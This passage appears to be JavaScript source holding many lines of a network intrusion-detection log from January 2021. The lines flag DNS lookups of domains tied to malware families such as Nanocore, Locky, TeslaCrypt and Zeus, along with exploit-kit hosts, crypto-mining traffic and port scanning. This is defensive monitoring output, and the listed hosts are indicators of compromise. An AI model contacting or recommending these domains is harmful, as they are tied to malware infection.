    '"2021-01-11 04:10:42.925711" r2d2 2.200.110.233 63565 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:10:43.382504" r2d2 2.200.110.232 65401 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:10:49.928297" r2d2 10.43.192.103 59491 213.252.245.197 452 TCP IPORT 213.252.245.197:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:10:53.206620" r2d2 2.200.104.184 49224 192.12.94.30 53 UDP DNS toluhuku.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 04:10:59.620998" r2d2 2.200.110.232 64985 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 04:11:36.595424" r2d2 2.200.110.232 64200 2.200.107.168 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 04:11:36.622677" r2d2 2.200.110.233 64014 2.200.107.169 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 04:11:43.381680" r2d2 2.200.107.146 54438 97.74.108.9 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 04:11:43.379879" r2d2 2.200.110.232 64627 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 04:11:43.386731" r2d2 2.200.110.232 64748 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 04:11:43.383066" r2d2 2.200.110.232 64259 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 04:11:43.383177" r2d2 2.200.110.232 63981 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 04:11:43.386047" r2d2 2.200.110.232 63710 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 04:11:43.385246" r2d2 2.200.107.146 51220 192.55.83.30 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 04:11:43.391023" r2d2 2.200.110.232 64312 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 04:11:43.391137" r2d2 2.200.110.232 49285 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 04:11:43.394576" r2d2 2.200.110.232 63663 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 04:11:43.395969" r2d2 2.200.110.232 64170 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:11:43.396533" r2d2 2.200.110.232 63647 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 04:11:43.399210" r2d2 2.200.110.232 65336 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 04:11:43.397714" r2d2 2.200.110.232 65533 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 04:11:43.399435" r2d2 2.200.110.232 49431 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:11:43.401030" r2d2 2.200.107.146 10003 192.41.162.30 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 04:11:43.402153" r2d2 2.200.107.146 20879 192.41.162.30 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 04:11:43.402150" r2d2 2.200.107.146 47007 192.43.172.30 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:11:48.160028" r2d2 2.200.110.233 64564 2.200.107.169 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 04:11:48.192716" r2d2 2.200.110.233 49255 2.200.107.169 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:11:48.240601" r2d2 2.200.110.233 64617 2.200.107.169 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 04:11:52.940912" r2d2 2.200.110.233 63990 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:11:59.608447" r2d2 2.200.110.232 64443 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:11:59.610503" r2d2 2.200.107.146 55084 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:12:24.991457" r2d2 2.200.105.226 59664 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:12:24.991450" r2d2 2.200.105.226 59664 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 04:12:40.518561" r2d2 2.200.110.232 64651 2.200.107.168 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 04:12:40.935227" r2d2 2.200.110.232 64599 2.200.107.168 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 04:12:43.404231" r2d2 2.200.110.232 49298 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:12:51.052842" r2d2 10.3.160.42 27225 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:12:51.149253" r2d2 10.3.160.42 27225 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:12:51.249927" r2d2 10.3.160.42 27225 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:12:51.455343" r2d2 10.3.160.42 27225 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:12:51.749294" r2d2 10.3.160.42 27225 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:12:52.149921" r2d2 10.3.160.42 27225 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:12:52.652979" r2d2 10.3.160.42 27225 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:12:46.700735" r2d2 10.36.192.126 59753 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;9c8fbeff-b8d6-4cfe-bfac-f1f994df8c76;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:12:53.248770" r2d2 10.3.160.42 27225 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 04:12:59.352615" r2d2 2.200.110.232 64111 2.200.107.168 53 UDP DNS (td-username-db4-63-169).wix.com "free web hosting (suspicious)" (static)\n' +
    '"2021-01-11 04:12:59.623924" r2d2 2.200.110.232 64001 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:13:02.943239" r2d2 2.200.110.233 64527 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:13:12.808477" r2d2 10.36.192.126 59835 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;9c8fbeff-b8d6-4cfe-bfac-f1f994df8c76;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:13:29.104848" r2d2 2.200.110.233 65002 2.200.107.169 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 04:13:32.000140" r2d2 2.200.108.59 13217,13218,13219,13222,13224,13226,13227,13228,13230,13231,13232,13233,13236,13237,13239,13240,13244,33312,34648,35048,35152,35542,36318,37666,38074,38922,39478,41806,41932,43088,43217,43218,43219,43720,44158,45108,45644,47518,47670,47700,48654,49192,49756,50484,50882,51322,51600,51728,53410,53596,54208,54210,54336,55400,55520,56630,56846,57572,58240,58364,58380,58390,58890,59492,60332,60340,60364,60540,60592 77.53.81.105 21,6760,7466,9010,10558,11703,12194,14326,16374,17600,17982,19190,24080,24696,26195,26631,28827,29579,30618,32341,33310,34028,35173,35462,36333,38631,39034,40934,40994,41828,42564,43944,44347,44544,44939,47277,47657,48631,50659,53310,54944,55038,56738,60904,61507,64094,64373,64738,64826 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 04:13:32.000034" r2d2 2.200.108.59 13218,13220,13221,13223,13225,13226,13229,13231,13233,13234,13235,13236,13239,13241,32860,33332,34206,34362,34900,35048,35450,35542,35744,36318,36956,37666,37720,38208,38696,40406,40762,40910,41018,42656,42714,43218,43220,43221,44004,46626,46680,47332,47700,47708,48302,48654,49192,49232,49360,50484,50528,50770,51322,51728,51894,52480,52852,53060,53252,53278,53410,53638,53808,53868,53940,55282,55400,55638,56488,56526,56602,57412,58122,58348,58380,58548,60340,60364 77.53.81.105 21,8105,8415,9010,9024,11703,13132,16053,16250,16633,17363,17666,18343,20411,21570,22387,23046,24249,24517,26087,26744,26896,27390,27579,28827,28905,29579,31528,32032,32292,32341,33035,35173,35364,35408,36333,36927,38542,38631,39730,39972,42227,45548,47140,47657,48180,48631,52987,54220,55038,55290,55431,56121,56681,56738,57144,59583,60904,62388,64373,64607 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 04:13:32.000145" r2d2 2.200.108.59 13217,13220,13223,13225,13228,13234,13238,13241,13242,13243,13244,33916,34648,35152,35858,36956,37006,37720,38340,38696,39478,39678,39970,40324,40406,40444,40910,41932,43088,43217,43556,43914,44158,45050,46580,46626,46796,47670,48302,49193,50124,50528,50882,51418,52158,53252,53940,55196,55282,56308,56488,56602,57466,57572,57726,58364,58394,58736,58890,59492,59820,60052,60332,60540,60592 77.53.81.105 21,6760,7833,10558,12194,12222,13132,14326,15277,15383,16053,16633,16705,19190,20411,21570,25969,26195,26744,29274,29304,30913,32292,32917,33310,36927,40934,40994,41172,43214,43823,44347,44544,44939,45252,45548,47150,47361,47737,47826,52987,53310,53372,54220,56681,57144,57688,58456,58662,60672,61112,61507,64826 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 04:13:34.000135" r2d2 2.200.108.59 34206,34362,35564,36082,42668,42714,45596,46680,47332,51894,52352,52480,52704,53060,56308,57466,57726,58548,60052 77.53.81.105 9024,12160,14832,15383,18610,22387,26087,33035,37596,39972,43823,47737,53372,55431,56121,59583,62388,62661,65505 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 04:13:43.382642" r2d2 2.200.110.232 49470 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:13:43.384290" r2d2 2.200.107.146 19639 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 04:13:43.396852" r2d2 2.200.110.232 63637 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:13:43.399298" r2d2 2.200.107.146 47275 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:13:59.614511" r2d2 2.200.110.232 63953 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 04:13:59.616537" r2d2 2.200.107.146 44369 37.209.192.12 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 04:14:08.006306" r2d2 2.200.110.233 63319 2.200.107.169 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 04:14:08.026285" r2d2 2.200.110.233 64582 2.200.107.169 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 04:14:08.333428" r2d2 2.200.110.233 64646 2.200.107.169 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 04:14:08.846480" r2d2 2.200.110.233 64589 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 04:14:01.778456" r2d2 10.1.19.42 59659 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 04:14:10.873794" r2d2 2.200.104.184 64023 205.251.193.194 53 UDP DNS ofhappinyer.com "pushbug (malicious)" (static)\n' +
    '"2021-01-11 04:14:10.892748" r2d2 2.200.104.184 62183 205.251.193.194 53 UDP DNS ofhappinyer.com "pushbug (malicious)" (static)\n' +
    '"2021-01-11 04:14:12.943845" r2d2 2.200.110.232 63795 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:14:12.945457" r2d2 2.200.107.146 3133 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:14:12.976737" r2d2 2.200.110.233 63758 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 04:14:18.779617" r2d2 10.43.193.193 49411 10.1.194.234 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 04:14:18.802443" r2d2 2.200.110.232 54144 2.200.107.168 53 UDP DNS hahofaba.com "pua (suspicious